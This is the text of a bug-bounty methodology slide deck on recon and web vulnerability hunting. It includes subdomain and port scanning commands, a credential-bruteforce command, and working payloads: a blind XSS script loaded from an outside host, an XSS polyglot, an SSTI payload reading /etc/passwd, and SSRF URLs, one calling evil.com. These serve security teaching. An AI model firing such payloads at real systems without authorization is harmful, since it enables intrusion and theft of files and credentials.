The Bug Hunters Methodology v2.1
whoami
Hack
Stuff
Better
(and practically)
What this talk is about...
And…LOTS of memes…. only some are funny
history && topics
Aka “How to Shot Web” @ DEFCON23
v2
light reading
Discovering New Targets
Discovery
TBHMv1
Sublist3r
Sublist3r
Sublist3r
Sub Scraping
recon-ng/enumall | Both | sublist3r |
ssltools.com API | Google (Recon-ng now handles captcha) | Baidu |
HackerTarget.com API | Bing | Ask |
Shodan | Crt.sh | DNSDumpster (scans.io) |
| ThreatCrowd | Virustotal |
Zoomeye (not core) | Netcraft | Ptrarchive.com |
Threatcrowd regged by email (not core) | | |
Zone transfer (not core) | | |
RiskIQ API (not core) | | |
Censys.io (not core) | | |
Sub Scraping (bespoke)
Sub Bruting
Tool | Time to run | Threads | Found |
subbrute time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output | errored | 100 | 0 |
gobuster time gobuster -m dns -u $TARGET.com -t 100 -w all.txt | 21m15.857s | 100 | 87 |
massdns time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt - | 1m24.167 | n/a | 213 |
dns-parallel-prober time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt | 42m2.868s | 100 | 43 |
blacksheepwall time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com | 256m9.385s | 100 | 61 |
1,136,964 line subdomain dictionary (all.txt)
Sub Bruting
With Massdns, why not all of them?
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
Acquisitions
Port Scanning
Tool | Time to run | Found |
masscan masscan -p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL $TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT | 11m4.164s | 196 |
nmap | ∞ | zzz |
65536 unverified Hosts (a large targets ASN)
Interlude... credential bruteforce
masscan
Brutespray credential bruteforce
Nmap service scan -oG
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
https://github.com/x90skysn3k/brutespray
Interlude... credential bruteforce
Visual Identification
On App Discovery
WALKING & UNDERSTAND THE APP
Platform Identification and CVE searching
TBHMv1
Coverage for Heavy js sites
jsparser
Linkfinder
Content Discovery / Directory Bruting
TBHMv1
CommonSpeak and Scans.io data
Parameter Bruting?
Identify IPs and main TLDs
ASNs
Reverse Whois
Acquisitions
++
Domain bruteforcing,
Resolve && add new IP ranges
Domain scraping for discovered TLDs
Portscan
Visual Identification
Platform Identification
Content Discovery
enumall
sublist3r
++
Massdns
Manual
masscan
eyewitness
Parameter discovery
Builtwith
Wappalyzer
++
Patator or gobuster
Wordlists
Burp
Parameth
Burp analyze target
XSS
XSS (not a lot)
TBHMv1
Blind XSS
“><script src=//y.vg></script>
BUG
Jamie: I really enjoy my super admin access this morning !!!
Y.vg is a a javascript shell !!#!
Frans: I really enjoy my NEW super admin access this morning !!!
1
4
3
2
XSSHunter
Payload:
XSS Polyglot #4
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e�
Jackmasa’s XSS
Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template Injection
SSTI
s
Core Idea: Does the application utilize a template engine? ++
TBHMv1
SSTI
s
1: https://acme.com/errorpage{{2*3}}
2:
https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
SSTI Tooling
Server Side Template Injection & Logic / Debug parameters
{regex + perm} template | content |
preview | redirect |
id | |
view | |
activity | |
name | |
http://acme.com/script?name={{2*3}}
Server Side Request Forgery
SSRF
Common Parameters or Injection points from TBHMv1 | |
file= | folder= |
location= | style= |
locale= | template= |
path= | doc= |
display= | source= |
load= | pdf= |
read= | dest= |
retrieve= | continue= |
TBHMv1
SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET��
SSRF Resources
SSRF Resources
Server Side Request Forgery
Many on the File Includes / Dir Traversal table | |||
{regex + perm} dest | {regex} redirect | {regex + perm} uri | {regex} path |
{regex} continue | {regex + perm} url | {regex} window | {regex} next |
{regex} data | {regex} reference | {regex + perm} site | {regex} html |
{regex + perm} val | {regex} validate | {regex} domain | {regex} callback |
{regex} return | {regex + perm} page | {regex} feed | {regex} host |
{regex} port | | | |
http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future Fuzzing, ++
Code Injection + CMD Injection + New Fuzzing
TBHMv1
albinowax (James Kettle)
IDOR - MFLAC
Insecure Direct Object Reference
{regex + perm} id | {regex + perm} user | |
{regex + perm} account | {regex + perm} number | |
{regex + perm} order | {regex + perm} no | |
{regex + perm} doc | {regex + perm} key | |
{regex + perm} email | {regex + perm} group | |
{regex + perm} profile | {regex + perm} edit | REST numeric paths |
http://acme.com/script?user=21856
Code Injection + CMD Injection
Backslash Powered Scanner
Infrastructure & Config
Subdomain takeover!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
WAF
What’s in a name?
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Resources
Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins | |
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2) - Seth Art | |
Server-side browsing�considered harmful - Nicolas Grégoire | |
How To: Server-Side Request Forgery (SSRF) - Jobert Abma | |
Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read - Brett Buerhaus | |
Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition - Max Zinkus |
CommInj Resources
Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins | |
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2) - Seth Art | |
Server-side browsing�considered harmful - Nicolas Grégoire | |
How To: Server-Side Request Forgery (SSRF) - Jobert Abma | |
Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read - Brett Buerhaus | |
Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition - Max Zinkus |
SSTI
Resources
Original Whitepaper - James Kettle | |
OWASP SSTI Workshop - Gérôme Dieu | |
Exploring SSTI in Flask/Jinja2 - Tim Tomes� | |
Injecting Flask - Ryan Reid | |
Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin | |
uber.com may RCE by Flask Jinja2 Template Injection - Orange Tsai |
Hi Pete!
Links
Peter Yaworski | https://leanpub.com/web-hacking-101 |
Andy Gill | https://leanpub.com/ltr101-breaking-into-infosec |
aboul3la | https://github.com/aboul3la/Sublist3r |
jhaddix | https://github.com/jhaddix/domain |
Tim tomes | https://bitbucket.org/LaNMaSteR53/recon-ng |
@infosec_au & @nnwakelam | https://github.com/infosec-au/altdns |
blechschmidt | https://github.com/blechschmidt/massdns |
robertdavidgraham | https://github.com/robertdavidgraham/masscan |
jhaddix - all.txt | https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056 |
anshumanbh | https://github.com/anshumanbh/brutesubs |
OJ Reeves | https://github.com/OJ/gobuster |
Links
epinna | https://github.com/epinna/tplmap |
| https://github.com/mak-/parameth |
| https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9 |
| https://github.com/ChrisTruncer/EyeWitness |
| https://github.com/jackmasa/XSS.png |
| https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056 |
Links
| https://github.com/lorenzog/dns-parallel-prober |
SSRF Bible | https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit# |
| https://github.com/ewilded/psychoPATH |
| https://github.com/commixproject/commix |
| |
| |
| |
| |
| |
| |
| |
| |
Links
| https://github.com/qazbnm456/awesome-web-security |
| https://github.com/infoslack/awesome-web-hacking |
| https://github.com/djadmin/awesome-bug-bounty |
| |
| |
| |
| |
| |
| |
| |
| |
| |
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com